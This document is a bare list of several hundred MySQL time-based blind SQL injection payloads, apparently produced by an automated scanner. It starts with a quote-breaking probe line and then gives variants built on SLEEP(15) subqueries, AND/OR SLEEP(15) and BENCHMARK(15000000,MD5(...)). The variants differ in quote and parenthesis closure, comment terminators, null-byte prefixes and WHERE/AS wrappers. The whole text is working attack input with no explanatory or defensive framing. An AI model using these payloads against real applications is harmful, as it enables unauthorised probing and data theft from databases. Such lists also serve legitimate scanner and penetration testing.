.)(.)''(('
'Tfzq<'">BWNJ
) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)
') AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)
' AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)
" AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)
) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (9748=9748
)) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((8189=8189
))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (((5445=5445
 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)
') AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ('AhCQ'='AhCQ
')) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (('HTEA'='HTEA
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((('LgbK'='LgbK
' AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND 'qoFt'='qoFt
') AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ('tcpR' LIKE 'tcpR
')) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (('IjQD' LIKE 'IjQD
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((('hBcf' LIKE 'hBcf
' AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND 'GEBs' LIKE 'GEBs
") AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ("LuQL"="LuQL
")) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (("ceqc"="ceqc
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((("QeaJ"="QeaJ
" AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND "NYgL"="NYgL
") AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ("CKzL" LIKE "CKzL
")) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (("xbDF" LIKE "xbDF
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((("xXgA" LIKE "xXgA
" AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND "dogt" LIKE "dogt
%') AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ('%'='
%')) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (('%'='
%'))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((('%'='
%' AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND '%'='
%") AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ("%"="
%")) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (("%"="
%"))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((("%"="
%" AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND "%"="
%00') AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ('QMbH'='QMbH
%00')) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND (('UyGT'='UyGT
%00'))) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND ((('Onrk'='Onrk
%00' AND (SELECT * FROM (SELECT(SLEEP(15)))blOL) AND 'xflr'='xflr
 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- ZyfB
 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)# UGHL
') WHERE 3970=3970 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
") WHERE 6400=6400 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
) WHERE 7087=7087 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
' WHERE 5546=5546 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
" WHERE 1485=1485 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
 WHERE 5575=5575 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
')) AS CWAZ WHERE 9160=9160 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
")) AS GCob WHERE 6327=6327 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
)) AS xXWC WHERE 7498=7498 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
') AS tzNV WHERE 7879=7879 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
") AS MrTz WHERE 6615=6615 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
) AS ecQl WHERE 6253=6253 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)-- 
'||(SELECT 'tfIo' FROM DUAL WHERE 9359=9359 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL))||'
'||(SELECT 'brlT' WHERE 3219=3219 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL))||'
'+(SELECT MeaJ WHERE 7238=7238 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL))+'
'+(SELECT 'sExa' WHERE 7456=7456 AND (SELECT * FROM (SELECT(SLEEP(15)))blOL))+'
' IN BOOLEAN MODE) AND (SELECT * FROM (SELECT(SLEEP(15)))blOL)#
) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)
') OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)
' OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)
" OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)
) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (8890=8890
)) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((9042=9042
))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (((7616=7616
 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)
') OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ('JClM'='JClM
')) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (('qEDo'='qEDo
'))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((('BhMQ'='BhMQ
' OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND 'TWMq'='TWMq
') OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ('gile' LIKE 'gile
')) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (('QhBS' LIKE 'QhBS
'))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((('VAui' LIKE 'VAui
' OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND 'YRtr' LIKE 'YRtr
") OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ("RNeu"="RNeu
")) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (("mNVH"="mNVH
"))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((("BKYv"="BKYv
" OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND "BWPP"="BWPP
") OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ("FEXs" LIKE "FEXs
")) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (("dhNd" LIKE "dhNd
"))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((("CEeC" LIKE "CEeC
" OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND "dkfU" LIKE "dkfU
%') OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ('%'='
%')) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (('%'='
%'))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((('%'='
%' OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND '%'='
%") OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ("%"="
%")) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (("%"="
%"))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((("%"="
%" OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND "%"="
%00') OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ('kGiD'='kGiD
%00')) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND (('QjDt'='QjDt
%00'))) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND ((('zlwy'='zlwy
%00' OR (SELECT * FROM (SELECT(SLEEP(15)))nCef) AND 'Orex'='Orex
 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- eKKH
 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)# KaVY
') WHERE 2476=2476 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
") WHERE 2639=2639 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
) WHERE 2093=2093 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
' WHERE 9253=9253 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
" WHERE 7449=7449 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
 WHERE 5529=5529 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
')) AS caMN WHERE 6693=6693 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
")) AS FezP WHERE 2012=2012 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
)) AS XoRG WHERE 3193=3193 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
') AS Schh WHERE 9288=9288 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
") AS fYuI WHERE 2877=2877 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
) AS TtJD WHERE 4539=4539 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)-- 
'||(SELECT 'YYpV' FROM DUAL WHERE 3788=3788 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef))||'
'||(SELECT 'PWqp' WHERE 3715=3715 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef))||'
'+(SELECT KJkY WHERE 1772=1772 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef))+'
'+(SELECT 'qTIl' WHERE 1781=1781 OR (SELECT * FROM (SELECT(SLEEP(15)))nCef))+'
' IN BOOLEAN MODE) OR (SELECT * FROM (SELECT(SLEEP(15)))nCef)#
) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
') AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
' AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
" AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
)) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
')) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
") AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
")) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
"))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%') AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%')) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%' AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%") AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%")) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%"))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%" AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%00') AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%00')) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%00'))) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
%00' AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
') WHERE 5030=5030 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
") WHERE 1281=1281 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
) WHERE 6603=6603 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
' WHERE 2893=2893 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
" WHERE 4567=4567 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
 WHERE 8730=8730 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
')) AS ymrQ WHERE 8788=8788 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
")) AS jECe WHERE 1132=1132 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
)) AS QYwu WHERE 3624=3624 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
') AS AGMo WHERE 3915=3915 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
") AS NzPF WHERE 6617=6617 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
) AS mrMv WHERE 6404=6404 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
'||(SELECT 'VaHa' FROM DUAL WHERE 2362=2362 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
'||(SELECT 'CKSB' WHERE 2610=2610 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
'+(SELECT DKDR WHERE 7838=7838 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
'+(SELECT 'TLub' WHERE 1139=1139 AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
' IN BOOLEAN MODE) AND (SELECT * FROM (SELECT(SLEEP(15)))OZhe)#
) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
') OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
' OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
" OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
)) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
')) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
'))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
") OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
")) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
"))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%') OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%')) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%'))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%' OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%") OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%")) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%"))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%" OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%00') OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%00')) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%00'))) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
%00' OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
') WHERE 9634=9634 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
") WHERE 7822=7822 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
) WHERE 3288=3288 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
' WHERE 2488=2488 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
" WHERE 6745=6745 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
 WHERE 6965=6965 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
')) AS PDIf WHERE 4445=4445 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
")) AS hBrF WHERE 2455=2455 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
)) AS Tzut WHERE 7207=7207 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
') AS joVO WHERE 4051=4051 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
") AS nFzp WHERE 9335=9335 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
) AS vWov WHERE 7848=7848 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
'||(SELECT 'viyJ' FROM DUAL WHERE 3328=3328 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
'||(SELECT 'yMsH' WHERE 4693=4693 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
'+(SELECT kriz WHERE 8434=8434 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
'+(SELECT 'TeMC' WHERE 4415=4415 OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
' IN BOOLEAN MODE) OR (SELECT * FROM (SELECT(SLEEP(15)))GdpR)#
) AND SLEEP(15)
') AND SLEEP(15)
' AND SLEEP(15)
" AND SLEEP(15)
) AND SLEEP(15) AND (8365=8365
)) AND SLEEP(15) AND ((5255=5255
))) AND SLEEP(15) AND (((5915=5915
 AND SLEEP(15)
') AND SLEEP(15) AND ('vvRj'='vvRj
')) AND SLEEP(15) AND (('BnBu'='BnBu
'))) AND SLEEP(15) AND ((('KKbX'='KKbX
' AND SLEEP(15) AND 'fWHW'='fWHW
') AND SLEEP(15) AND ('MpZj' LIKE 'MpZj
')) AND SLEEP(15) AND (('TkOU' LIKE 'TkOU
'))) AND SLEEP(15) AND ((('waxz' LIKE 'waxz
' AND SLEEP(15) AND 'ZLic' LIKE 'ZLic
") AND SLEEP(15) AND ("EyMj"="EyMj
")) AND SLEEP(15) AND (("emcb"="emcb
"))) AND SLEEP(15) AND ((("iDik"="iDik
" AND SLEEP(15) AND "rceP"="rceP
") AND SLEEP(15) AND ("TGXc" LIKE "TGXc
")) AND SLEEP(15) AND (("WsSF" LIKE "WsSF
"))) AND SLEEP(15) AND ((("jpHu" LIKE "jpHu
" AND SLEEP(15) AND "iBrQ" LIKE "iBrQ
%') AND SLEEP(15) AND ('%'='
%')) AND SLEEP(15) AND (('%'='
%'))) AND SLEEP(15) AND ((('%'='
%' AND SLEEP(15) AND '%'='
%") AND SLEEP(15) AND ("%"="
%")) AND SLEEP(15) AND (("%"="
%"))) AND SLEEP(15) AND ((("%"="
%" AND SLEEP(15) AND "%"="
%00') AND SLEEP(15) AND ('EOpn'='EOpn
%00')) AND SLEEP(15) AND (('dxBO'='dxBO
%00'))) AND SLEEP(15) AND ((('CCqt'='CCqt
%00' AND SLEEP(15) AND 'SrYS'='SrYS
 AND SLEEP(15)-- vtkq
 AND SLEEP(15)# dlHc
') WHERE 5362=5362 AND SLEEP(15)-- 
") WHERE 3778=3778 AND SLEEP(15)-- 
) WHERE 6186=6186 AND SLEEP(15)-- 
' WHERE 6541=6541 AND SLEEP(15)-- 
" WHERE 5791=5791 AND SLEEP(15)-- 
 WHERE 7633=7633 AND SLEEP(15)-- 
')) AS eutZ WHERE 9162=9162 AND SLEEP(15)-- 
")) AS WDtY WHERE 6098=6098 AND SLEEP(15)-- 
)) AS spgU WHERE 4003=4003 AND SLEEP(15)-- 
') AS CheH WHERE 4379=4379 AND SLEEP(15)-- 
") AS yiVZ WHERE 8518=8518 AND SLEEP(15)-- 
) AS WXgf WHERE 6760=6760 AND SLEEP(15)-- 
'||(SELECT 'mCDj' FROM DUAL WHERE 9325=9325 AND SLEEP(15))||'
'||(SELECT 'mvPl' WHERE 6006=6006 AND SLEEP(15))||'
'+(SELECT EYGI WHERE 4818=4818 AND SLEEP(15))+'
'+(SELECT 'bQdR' WHERE 2717=2717 AND SLEEP(15))+'
' IN BOOLEAN MODE) AND SLEEP(15)#
) OR SLEEP(15)
') OR SLEEP(15)
' OR SLEEP(15)
" OR SLEEP(15)
) OR SLEEP(15) AND (8462=8462
)) OR SLEEP(15) AND ((1345=1345
))) OR SLEEP(15) AND (((2727=2727
 OR SLEEP(15)
') OR SLEEP(15) AND ('TaMD'='TaMD
')) OR SLEEP(15) AND (('bCFx'='bCFx
'))) OR SLEEP(15) AND ((('AcMl'='AcMl
' OR SLEEP(15) AND 'xpHP'='xpHP
') OR SLEEP(15) AND ('tTil' LIKE 'tTil
')) OR SLEEP(15) AND (('yVuV' LIKE 'yVuV
'))) OR SLEEP(15) AND ((('zdAM' LIKE 'zdAM
' OR SLEEP(15) AND 'ybEW' LIKE 'ybEW
") OR SLEEP(15) AND ("FEkl"="FEkl
")) OR SLEEP(15) AND (("rPkD"="rPkD
"))) OR SLEEP(15) AND ((("gKaM"="gKaM
" OR SLEEP(15) AND "Exoo"="Exoo
") OR SLEEP(15) AND ("pVpy" LIKE "pVpy
")) OR SLEEP(15) AND (("gnwM" LIKE "gnwM
"))) OR SLEEP(15) AND ((("ZGNQ" LIKE "ZGNQ
" OR SLEEP(15) AND "lHuh" LIKE "lHuh
%') OR SLEEP(15) AND ('%'='
%')) OR SLEEP(15) AND (('%'='
%'))) OR SLEEP(15) AND ((('%'='
%' OR SLEEP(15) AND '%'='
%") OR SLEEP(15) AND ("%"="
%")) OR SLEEP(15) AND (("%"="
%"))) OR SLEEP(15) AND ((("%"="
%" OR SLEEP(15) AND "%"="
%00') OR SLEEP(15) AND ('OQTI'='OQTI
%00')) OR SLEEP(15) AND (('UcBL'='UcBL
%00'))) OR SLEEP(15) AND ((('NsOi'='NsOi
%00' OR SLEEP(15) AND 'SCqJ'='SCqJ
 OR SLEEP(15)-- FxwY
 OR SLEEP(15)# Mmho
') WHERE 3978=3978 OR SLEEP(15)-- 
") WHERE 6589=6589 OR SLEEP(15)-- 
) WHERE 6132=6132 OR SLEEP(15)-- 
' WHERE 8823=8823 OR SLEEP(15)-- 
" WHERE 7112=7112 OR SLEEP(15)-- 
 WHERE 5265=5265 OR SLEEP(15)-- 
')) AS QFQa WHERE 8263=8263 OR SLEEP(15)-- 
")) AS eFId WHERE 8524=8524 OR SLEEP(15)-- 
)) AS FHLq WHERE 9719=9719 OR SLEEP(15)-- 
') AS tkiI WHERE 6623=6623 OR SLEEP(15)-- 
") AS IttQ WHERE 6300=6300 OR SLEEP(15)-- 
) AS tsKH WHERE 8397=8397 OR SLEEP(15)-- 
'||(SELECT 'qkqo' FROM DUAL WHERE 9107=9107 OR SLEEP(15))||'
'||(SELECT 'pmKo' WHERE 6393=6393 OR SLEEP(15))||'
'+(SELECT ttlQ WHERE 1494=1494 OR SLEEP(15))+'
'+(SELECT 'IhZh' WHERE 9155=9155 OR SLEEP(15))+'
' IN BOOLEAN MODE) OR SLEEP(15)#
) AND SLEEP(15)#
') AND SLEEP(15)#
' AND SLEEP(15)#
" AND SLEEP(15)#
)) AND SLEEP(15)#
))) AND SLEEP(15)#
 AND SLEEP(15)#
')) AND SLEEP(15)#
'))) AND SLEEP(15)#
") AND SLEEP(15)#
")) AND SLEEP(15)#
"))) AND SLEEP(15)#
%') AND SLEEP(15)#
%')) AND SLEEP(15)#
%'))) AND SLEEP(15)#
%' AND SLEEP(15)#
%") AND SLEEP(15)#
%")) AND SLEEP(15)#
%"))) AND SLEEP(15)#
%" AND SLEEP(15)#
%00') AND SLEEP(15)#
%00')) AND SLEEP(15)#
%00'))) AND SLEEP(15)#
%00' AND SLEEP(15)#
') WHERE 2408=2408 AND SLEEP(15)#
") WHERE 5276=5276 AND SLEEP(15)#
) WHERE 2666=2666 AND SLEEP(15)#
' WHERE 8382=8382 AND SLEEP(15)#
" WHERE 4227=4227 AND SLEEP(15)#
 WHERE 4937=4937 AND SLEEP(15)#
')) AS wpnc WHERE 6311=6311 AND SLEEP(15)#
")) AS TWVi WHERE 8688=8688 AND SLEEP(15)#
)) AS BePs WHERE 3553=3553 AND SLEEP(15)#
') AS SjdB WHERE 9158=9158 AND SLEEP(15)#
") AS vsyX WHERE 7601=7601 AND SLEEP(15)#
) AS DTPy WHERE 7883=7883 AND SLEEP(15)#
'||(SELECT 'siEx' FROM DUAL WHERE 7220=7220 AND SLEEP(15)#
'||(SELECT 'TJln' WHERE 8110=8110 AND SLEEP(15)#
'+(SELECT VbcS WHERE 4389=4389 AND SLEEP(15)#
'+(SELECT 'FGTO' WHERE 9702=9702 AND SLEEP(15)#
) OR SLEEP(15)#
') OR SLEEP(15)#
' OR SLEEP(15)#
" OR SLEEP(15)#
)) OR SLEEP(15)#
))) OR SLEEP(15)#
 OR SLEEP(15)#
')) OR SLEEP(15)#
'))) OR SLEEP(15)#
") OR SLEEP(15)#
")) OR SLEEP(15)#
"))) OR SLEEP(15)#
%') OR SLEEP(15)#
%')) OR SLEEP(15)#
%'))) OR SLEEP(15)#
%' OR SLEEP(15)#
%") OR SLEEP(15)#
%")) OR SLEEP(15)#
%"))) OR SLEEP(15)#
%" OR SLEEP(15)#
%00') OR SLEEP(15)#
%00')) OR SLEEP(15)#
%00'))) OR SLEEP(15)#
%00' OR SLEEP(15)#
') WHERE 3909=3909 OR SLEEP(15)#
") WHERE 8837=8837 OR SLEEP(15)#
) WHERE 8565=8565 OR SLEEP(15)#
' WHERE 2666=2666 OR SLEEP(15)#
" WHERE 5493=5493 OR SLEEP(15)#
 WHERE 3433=3433 OR SLEEP(15)#
')) AS poRB WHERE 3133=3133 OR SLEEP(15)#
")) AS bKph WHERE 7760=7760 OR SLEEP(15)#
)) AS mWaw WHERE 6589=6589 OR SLEEP(15)#
') AS WkKs WHERE 2982=2982 OR SLEEP(15)#
") AS kmCC WHERE 3360=3360 OR SLEEP(15)#
) AS rQIK WHERE 3192=3192 OR SLEEP(15)#
'||(SELECT 'JsBY' FROM DUAL WHERE 8663=8663 OR SLEEP(15)#
'||(SELECT 'oSDW' WHERE 5676=5676 OR SLEEP(15)#
'+(SELECT wPpu WHERE 9711=9711 OR SLEEP(15)#
'+(SELECT 'wrpF' WHERE 2136=2136 OR SLEEP(15)#
) AND 4041=BENCHMARK(15000000,MD5(0x46795478))
') AND 4041=BENCHMARK(15000000,MD5(0x46795478))
' AND 4041=BENCHMARK(15000000,MD5(0x46795478))
" AND 4041=BENCHMARK(15000000,MD5(0x46795478))
) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (2702=2702
)) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((3771=3771
))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (((4029=4029
 AND 4041=BENCHMARK(15000000,MD5(0x46795478))
') AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ('EauH'='EauH
')) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (('taGz'='taGz
'))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((('Sssp'='Sssp
' AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND 'Nyhp'='Nyhp
') AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ('FLCS' LIKE 'FLCS
')) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (('YRiX' LIKE 'YRiX
'))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((('MFfk' LIKE 'MFfk
' AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND 'AnVi' LIKE 'AnVi
") AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ("jCiE"="jCiE
")) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (("pmhv"="pmhv
"))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((("blQe"="blQe
" AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND "vvlQ"="vvlQ
") AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ("gPJY" LIKE "gPJY
")) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (("ljmf" LIKE "ljmf
"))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((("ItaZ" LIKE "ItaZ
" AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND "RhLX" LIKE "RhLX
%') AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ('%'='
%')) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (('%'='
%'))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((('%'='
%' AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND '%'='
%") AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ("%"="
%")) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (("%"="
%"))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((("%"="
%" AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND "%"="
%00') AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ('AXwt'='AXwt
%00')) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND (('UFuM'='UFuM
%00'))) AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND ((('RDcY'='RDcY
%00' AND 4041=BENCHMARK(15000000,MD5(0x46795478)) AND 'FBFi'='FBFi
 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- gAph
 AND 4041=BENCHMARK(15000000,MD5(0x46795478))# MAon
') WHERE 3098=3098 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
") WHERE 4228=4228 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
) WHERE 7080=7080 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
' WHERE 7676=7676 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
" WHERE 9486=9486 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
 WHERE 7184=7184 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
')) AS XHgw WHERE 6734=6734 AND 4041=BENCHMARK(15000000,MD5(0x46795478))-- 
